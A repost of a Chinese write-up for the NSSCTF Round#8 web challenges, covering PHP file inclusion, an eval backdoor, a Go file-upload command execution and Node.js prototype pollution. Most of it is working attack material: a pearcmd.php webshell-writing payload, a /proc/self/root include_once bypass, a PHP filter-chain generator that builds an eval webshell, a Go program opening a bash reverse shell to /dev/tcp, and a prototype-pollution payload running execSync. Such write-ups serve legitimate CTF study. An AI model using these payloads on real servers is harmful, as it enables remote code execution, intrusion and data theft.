文章目录 MyPage方法一: pearcmd.php方法二:多级连接绕过方法三: PHP Base64 Filter 宽松解析 MyDoorUpload_gogoggoez_node
Where is my page?
拿到题目就是这个样子
感觉就是文件包含
可以读取,可以用filter协议
但是index.PHP怎么尝试都没读取到,data和input等协议都被ban了
filter读取不到index.php,可以试试pearcmd.php
的姿势写shell
index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/=eval($_POST[1]);?>+/tmp/shell.php
利用文件包含漏洞包含这个文件即可
/proc/self/root/
多级连接绕过 include_once
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php
注意最后是proc/self/cwd/
index.php源码是
error_reporting(0);include 'flag.php';if(!isset($_GET['file'])) { header('Location:/index.php?file=');} else { $file = $_GET['file']; if (!preg_match('/\.\.|data|input|glob|global|var|dict|Gopher|file|Http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) { include_once $file; } else { die('error.'); }}
include_once
不能重复包含,然后上面已经有include 'flag.php'
包含了,所以读不到flag.php
至于不能正常读到index.php我比较迷惑,应该是执行这个文件其实已经算包含一遍了,也是include_once
的问题,换成include就可以正常读。
/proc/self/root/
多级连接绕过原理可参考此文
我在写这题时候 用了这个方法,不过payload生成可能产生一点问题,复现倒是很顺
$base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"; $conversions = array( 'R' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.Mac.UCS2', 'B' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', 'C' => 'convert.iconv.UTF8.CSISO2022KR', '8' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', '9' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', 'f' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', 's' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', 'z' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', 'U' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', 'P' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', 'V' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', '0' => 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', 'Y' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', 'W' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', 'd' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', 'D' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', '7' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', '4' => 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2');$filters = "convert.base64-encode|";# make sure to get rid of any equal signs in both the string we just generated and the rest of the file$filters .= "convert.iconv.UTF8.UTF7|";foreach (str_split(strrev($base64_payload)) as $c) { $filters .= $conversions[$c] . "|"; $filters .= "convert.base64-decode|"; $filters .= "convert.base64-encode|"; $filters .= "convert.iconv.UTF8.UTF7|";}$filters .= "convert.base64-decode";$final_payload = "php://filter/{$filters}/resource=/etc/passwd";echo $final_payload;#var_dump(file_get_contents($final_payload));
一个普通的后门。
这题的初始页面与上题一模一样
不一样的是可以直接伪协议读取到index.php (没用include_once)
能filter伪协议读取到index.php的源码
error_reporting(0);if (isset($_GET['N_S.S'])) { eval($_GET['N_S.S']);}if(!isset($_GET['file'])) { header('Location:/index.php?file=');} else { $file = $_GET['file']; if (!preg_match('/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) { include $file; } else { die('error.'); }}
可以利用eval执行命令
eval($_GET['N_S.S']);
这个参数N_S.S
还涉及到了php的非法传参问题
当PHP版本小于8
时,如果参数中出现中括号[
,中括号会被转换成下划线_
,但是会出现转换错误导致接下来如果该参数名中还有非法字符
并不会继续转换成下划线_
,也就是说如果中括号[
出现在前面,那么中括号[
还是会被转换成下划线_
,但是因为出错导致接下来的非法字符并不会被转换成下划线_
那么就可以用N[S.S
传参
flag找了挺久,在环境变量env里面
没有任何过滤的文件上传!
是一个golang的文件上传 类似于[2022DASCTF MAY 挑战赛] hackme
没有复现吃亏了
之前也没接触很少go的题目
这里上传了个pass.png 可以看到它System output : go pass: unknown command
执行了 go pass
的命令
可以上传一个golang命令执行的文件 run.go
,这样就会执行 go run
的命令
package mainimport ("fmt""log""os/exec")func main() {cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/vps/ip 0>&1")out, err := cmd.CombinedOutput()if err != nil {fmt.Printf("combined out:\n%s\n", string(out))log.Fatalf("cmd.Run() failed with %s\n", err)}fmt.Printf("combined out:\n%s\n", string(out))}
flag是藏在home下
const express = require("express");const path = require("path");const fs = require("fs");const multer = require("multer");const PORT = process.env.port || 3000const app = express();global = "global"app.listen(PORT, () => { console.log(`listen at ${PORT}`);});function merge(target, source) { for (let key in source) { if (key in source && key in target) { merge(target[key], source[key]) } else { target[key] = source[key] } }}let objMulter = multer({ dest: "./upload" });app.use(objMulter.any());app.use(express.static("./public"));app.post("/upload", (req, res) => { try{ let oldName = req.files[0].path; let newName = req.files[0].path + path.parse(req.files[0].originalname).ext; fs.renameSync(oldName, newName); res.send({ err: 0, url: "./upload/" + req.files[0].filename + path.parse(req.files[0].originalname).ext }); } catch(error){ res.send(require('./err.js').getRandomErr()) }});app.post('/pollution', require('body-parser').JSON(), (req, res) => { let data = {}; try{ merge(data, req.body); res.send('ReGISter successfully!tql') require('./err.js').getRandomErr() } catch(error){ res.send(require('./err.js').getRandomErr()) }})
这题没看懂
http://gtg.ink/ez-node-NSSCTF-round-8/ 出题人的wp
https://blog.csdn.net/weixin_52585514/article/details/128985443 V2师傅的wp
此题类似BalsnCTF 2022 2linenodejs
,v2师傅就直接用这个题的exp打
预期解是
//上传部分obj={ getRandomErr:() => { return require('child_process').execSync('cat /flag') }}module.exports = obj//污染部分{"constructor":{ "prototype":{ "data":{ "exports":{ ".":"./16285e8a41e03031c3638c8991393bc8.js" }, "name":"./err.js" }, "path":"./upload" } }}
来源地址:https://blog.csdn.net/qq_61768489/article/details/129016075
--结束END--
本文标题: NSSCTF Round#8 web专项赛
本文链接: https://lsjlt.com/news/415692.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0